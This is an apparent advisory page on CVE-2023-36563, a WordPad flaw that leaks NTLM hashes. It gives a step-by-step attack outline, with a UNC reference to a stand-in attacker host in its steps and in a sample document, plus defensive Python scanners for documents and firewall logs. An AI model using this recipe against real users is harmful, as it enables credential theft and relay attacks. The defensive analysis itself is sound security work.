CVE-2023-36563 — Microsoft WordPad Information Disclosure Vulnerability

CVE-2023-36563

Microsoft WordPad — Opening Malicious Document Leaks NTLM Hash to Attacker Server; October 2023 Zero-Day; Credential Relay Risk

What is Microsoft WordPad?

Microsoft WordPad is a lightweight rich-text document editor included in Windows that can open and create .doc, .rtf, and .docx files. Unlike the full Microsoft Word application, WordPad is installed by default on all Windows editions and does not require an Office license, which makes it a common fallback document viewer. Like many Windows applications that process Office-format documents, WordPad resolves remote references embedded in document content, including OLE objects, linked images, and embedded resource paths, by initiating outbound network connections. When such a connection reaches an attacker-controlled server, Windows can include the user's NTLM authentication credentials in it. Note: Microsoft removed WordPad from Windows in the Windows 11 24H2 update (released October 2024), eliminating this attack surface on updated systems.

Overview

CVE-2023-36563 is an information disclosure vulnerability (CWE-20, improper input validation) in Microsoft WordPad: when a user opens a maliciously crafted document, WordPad makes an outbound SMB or WebDAV connection to an attacker-controlled server, and Windows automatically answers that server's authentication challenge with the user's NTLMv2 challenge-response (commonly called the NTLM hash). The attacker captures the NTLMv2 hash and can either crack it offline (practical for weaker passwords) or relay it to authenticate to internal services (an NTLM relay attack). Microsoft patched CVE-2023-36563 in the October 2023 Patch Tuesday as an actively exploited zero-day, and CISA added it to the KEV catalog the same day.

The CVSS score (AV:N/PR:N/UI:R/C:H/I:N/A:N) reflects remote delivery (the attacker sends a malicious document), user interaction (the victim must open it), and high confidentiality impact (NTLM credential disclosure).

Affected Versions

Product                                         Affected   Fixed
Windows 10 (multiple versions)                  Yes        October 2023 cumulative update
Windows 11 (multiple versions, prior to 24H2)   Yes        October 2023 cumulative update
Windows Server 2008 R2 through 2022             Yes        October 2023 cumulative update

Note: Windows 11 24H2 removes WordPad entirely, eliminating the vulnerability.

Technical Details

The NTLM hash disclosure mechanism works as follows:

  1. Craft a malicious document — create a .doc or .rtf file containing an embedded OLE object, linked image, or remote resource reference pointing to an attacker-controlled UNC path (e.g., \\attacker.example.com\share\resource)
  2. Deliver the document — send the document via email, phishing link, or shared drive; convince the user to open it in WordPad
  3. WordPad resolves the remote reference — when parsing the document, WordPad attempts to access the embedded remote resource, initiating an SMB or WebDAV connection to the attacker's server
  4. Windows sends the NTLM hash — when the attacker's server requests NTLM authentication, Windows automatically responds with the user's NTLMv2 challenge-response (the captured "hash"), exactly as it would for any SMB server; the attacker's server records that response

With the captured NTLMv2 hash, the attacker can:

  • Crack the hash offline — run a dictionary or GPU-accelerated brute-force attack against the captured NTLMv2 response to recover the plaintext password; this succeeds only for weaker passwords
  • NTLM relay attack — relay the captured authentication to another internal service (file server, Exchange, IIS) that accepts NTLM authentication, impersonating the victim without knowing the password

The improper input validation (CWE-20) characterization reflects that WordPad does not validate remote references in document content before resolving them, so a reference to an arbitrary external host is enough to trigger an authenticated network connection that exposes NTLM credentials.
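The UNC references described in steps 1 and 3 are the artefact a mail gateway or triage pipeline can look for before a document ever reaches WordPad. The following Python scanner is an added example, not code from the original page or from Microsoft: it extracts \\host\share references from raw document bytes (RTF source, where every literal backslash is doubled, and UTF-16LE strings as found in binary .doc streams) and classifies each host as internal or external. The internal DNS suffix .corp.example, the RFC1918 definition of internal address space, and the two sample documents are constructed assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass

# UNC reference: \\host\share[\path]. The host/share separator is matched as one or
# more backslashes because RTF source doubles every literal backslash, so
# \\host\share appears in .rtf text as \\\\host\\share.
_UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9.\-]{0,252})\\+([^\\\x00\s\"'{}<>;]{1,80})")

# Constructed assumptions: the organisation's own DNS suffixes and its internal
# address space (RFC1918 plus loopback and link-local).
INTERNAL_SUFFIXES = (".corp.example",)
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


@dataclass(frozen=True)
class UncRef:
    host: str
    share: str
    encoding: str   # view in which the reference was found: "ascii" or "utf-16-le"
    external: bool  # True when resolving the host would send the request off-network


def is_external_host(host: str, internal_suffixes=INTERNAL_SUFFIXES) -> bool:
    """Classify a UNC host: IP literals by address range, names by DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in _INTERNAL_NETS)
    except ValueError:
        pass
    name = host.lower().rstrip(".")
    if "." not in name:
        # Single-label (NetBIOS-style) name: resolved by local name resolution,
        # so it is treated as internal for this classification.
        return False
    return not any(name.endswith(suffix) for suffix in internal_suffixes)


def find_unc_references(data: bytes, internal_suffixes=INTERNAL_SUFFIXES) -> list:
    """Extract de-duplicated UNC references from raw .rtf or .doc bytes."""
    # latin-1 maps every byte to one code point, so the ASCII view never fails to decode.
    views = [("ascii", data.decode("latin-1"))]
    # Binary Word formats store strings as UTF-16LE; try both byte alignments.
    for offset in (0, 1):
        views.append(("utf-16-le", data[offset:].decode("utf-16-le", errors="replace")))
    refs, seen = [], set()
    for encoding, text in views:
        for match in _UNC_RE.finditer(text):
            host, share = match.group(1), match.group(2)
            key = (host.lower(), share.lower())
            if key in seen:
                continue
            seen.add(key)
            refs.append(UncRef(host, share, encoding, is_external_host(host, internal_suffixes)))
    return refs


def external_hosts(data: bytes) -> list:
    """Hosts the document would contact off-network when opened; non-empty means quarantine."""
    return sorted({ref.host for ref in find_unc_references(data) if ref.external})


# Constructed sample documents (stand-ins, not real exploit files): an RTF body carrying
# one external and one internal reference, and a binary .doc-style fragment with a
# UTF-16LE reference to an external IP address.
RTF_SAMPLE = (r"{\rtf1\ansi Quarterly report "
              r"\\\\attacker.example.com\\share\\resource.png and "
              r"\\\\fileserver.corp.example\\public\\template.dotx }").encode("ascii")
DOC_SAMPLE = (b"\xd0\xcf\x11\xe0" + b"\x00" * 8
              + "\\\\203.0.113.7\\drop\\image.emf".encode("utf-16-le") + b"\x00" * 8)

if __name__ == "__main__":
    for name, doc in (("rtf", RTF_SAMPLE), ("doc", DOC_SAMPLE)):
        for ref in find_unc_references(doc):
            flag = "EXTERNAL" if ref.external else "internal"
            print(f"{name}: \\\\{ref.host}\\{ref.share} [{ref.encoding}] {flag}")
```

A document with any external host in `external_hosts()` is the one to hold at the gateway; an internal reference is normal for templates and shared images. Single-label names are classified as internal here, which is deliberate but worth revisiting in environments where LLMNR or NetBIOS name resolution is not disabled.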

Discovery

Microsoft confirmed CVE-2023-36563 was actively exploited at the time of patching — zero-day status. The October 2023 Patch Tuesday also included CVE-2023-41763 (Skype for Business SSRF), suggesting an active fall 2023 campaign targeting multiple Windows information disclosure vulnerabilities as part of a credential theft and reconnaissance strategy.

Exploitation Context

NTLM credential exfiltration via document-based triggers is a well-established technique used in phishing campaigns and internal red team operations. The WordPad vector is particularly effective because:

  • WordPad is installed on all Windows editions without an Office license
  • Files opened in WordPad receive less scrutiny than those opened in Word or Excel
  • The NTLM hash exfiltration occurs silently — the user sees no security warning and no obvious sign of the credential theft

NTLM relay attacks are commonly chained with this class of vulnerability: an attacker captures the hash and within seconds relays it to an internal file server or Exchange autodiscover endpoint, escalating from a phishing click to authenticated internal access.
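The hash leaves the host as an outbound SMB session, which is exactly what a host firewall log records. The following Python detection, an added example and not code from the original page or from Microsoft, runs over constructed log lines in the space-separated layout of the Windows Defender Firewall log (pfirewall.log) and flags outbound TCP 445/139 connections to destinations outside RFC1918 space: an ALLOW entry means the credential probably left the network, a DROP entry means an egress block caught it and the triggering document should be pulled. The internal address ranges and the log excerpt are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass

# Constructed assumption: internal address space is RFC1918 plus loopback/link-local.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}

# Column order of the Windows Defender Firewall log (pfirewall.log) "#Fields:" header.
FIELDS = ("date", "time", "action", "protocol", "src_ip", "dst_ip", "src_port", "dst_port",
          "size", "tcpflags", "tcpsyn", "tcpack", "tcpwin", "icmptype", "icmpcode", "info", "path")


@dataclass(frozen=True)
class SmbEgressAlert:
    when: str
    src_ip: str
    dst_ip: str
    dst_port: int
    action: str
    verdict: str


def is_external(ip_text: str) -> bool:
    """True when the address lies outside the (assumed) internal ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in _INTERNAL_NETS)


def parse_firewall_line(line: str):
    """Parse one pfirewall.log record into a dict; comment lines and short lines yield None."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    try:
        rec["src_port"] = int(rec["src_port"])
        rec["dst_port"] = int(rec["dst_port"])
    except ValueError:  # ICMP records carry "-" in the port columns
        return None
    return rec


def detect_smb_egress(lines) -> list:
    """Flag outbound SMB sessions to external hosts, the network trace of a leaked NTLM hash."""
    alerts = []
    for line in lines:
        rec = parse_firewall_line(line)
        if rec is None or rec["protocol"] != "TCP" or rec["path"] != "SEND":
            continue  # only locally initiated TCP connections matter here
        if rec["dst_port"] not in SMB_PORTS or not is_external(rec["dst_ip"]):
            continue
        if rec["action"] == "ALLOW":
            verdict = "session allowed: NTLMv2 response likely sent; reset the user's password and look for relay activity"
        else:
            verdict = "blocked by egress policy: identify the document that triggered the connection"
        alerts.append(SmbEgressAlert(f'{rec["date"]} {rec["time"]}', rec["src_ip"], rec["dst_ip"],
                                     rec["dst_port"], rec["action"], verdict))
    return alerts


# Constructed log excerpt in the pfirewall.log layout; 10.0.0.0/8 is the internal network.
SAMPLE_LOG = """\
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2023-10-10 09:11:58 ALLOW TCP 10.0.0.5 10.0.0.20 51230 445 0 - 0 0 0 - - - SEND
2023-10-10 09:12:01 ALLOW TCP 10.0.0.5 203.0.113.7 51234 445 0 - 0 0 0 - - - SEND
2023-10-10 09:12:03 ALLOW TCP 10.0.0.5 203.0.113.7 51235 443 0 - 0 0 0 - - - SEND
2023-10-10 09:12:09 ALLOW TCP 203.0.113.9 10.0.0.5 40022 445 0 - 0 0 0 - - - RECEIVE
2023-10-10 09:14:40 DROP TCP 10.0.0.8 198.51.100.23 52001 445 0 - 0 0 0 - - - SEND
2023-10-10 09:15:02 ALLOW ICMP 10.0.0.5 10.0.0.1 - - 60 - - - - 8 0 - SEND
""".splitlines()

if __name__ == "__main__":
    for alert in detect_smb_egress(SAMPLE_LOG):
        print(f"{alert.when} {alert.src_ip} -> {alert.dst_ip}:{alert.dst_port} {alert.action}: {alert.verdict}")
```

The 443 line in the sample passes through unflagged on purpose: the WebDAV fallback the advisory mentions rides on TCP 80/443 and cannot be told apart from ordinary web traffic in a firewall log. For that path, enable outgoing NTLM auditing (the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy in audit mode) and watch the Microsoft-Windows-NTLM/Operational log, where event 8001 records NTLM authentication to remote servers.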

Remediation

  1. Apply the October 2023 Windows cumulative update — patches CVE-2023-36563 in WordPad.
  2. Upgrade to Windows 11 24H2 — removes WordPad entirely, eliminating the attack surface.
  3. Block NTLM authentication outbound — configure Windows Firewall and proxy settings to block outbound SMB (TCP 445) connections to internet addresses; this prevents the NTLM hash from reaching external SMB servers. The WebDAV path uses TCP 80/443 and is not covered by that rule, so pair it with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy.
  4. Enable Extended Protection for Authentication (EPA) — reduces the effectiveness of NTLM relay attacks by binding NTLM authentication to the specific channel being protected.
  5. Consider disabling NTLM where Kerberos suffices — on modern Windows domain environments, Kerberos is preferred; disabling NTLM eliminates relay attack risk entirely, though compatibility testing is required.
  6. Configure WordPad file associations — if WordPad is still present and patching is delayed, reassign .doc/.rtf file associations to Word or a non-vulnerable viewer as a short-term workaround.

Key Details

Property              Value
CVE ID                CVE-2023-36563
Vendor / Product      Microsoft — WordPad
NVD Published         2023-10-10
NVD Last Modified     2025-10-28
CVSS 3.1 Score        6.5
CVSS 3.1 Vector       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Severity              MEDIUM
CWE                   CWE-20
CISA KEV Added        2023-10-10
CISA KEV Deadline     2023-10-31
Known Ransomware Use  No

CVSS 3.1 Breakdown

Attack Vector        Network
Attack Complexity    Low
Privileges Required  None
User Interaction     Required
Scope                Unchanged
Confidentiality      High
Integrity            None
Availability         None

Required Action

CISA BOD 22-01 Deadline: 2023-10-31. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
2023-10-10   Microsoft October 2023 Patch Tuesday — CVE-2023-36563 patched as an actively exploited zero-day; CVE published and CISA KEV entry added on the same day
2023-10-31   CISA BOD 22-01 remediation deadline

References

Resource                                       Type
Microsoft Security Response Center Advisory    Vendor Advisory
NVD — CVE-2023-36563                           Vulnerability Database
CISA KEV Catalog Entry                         US Government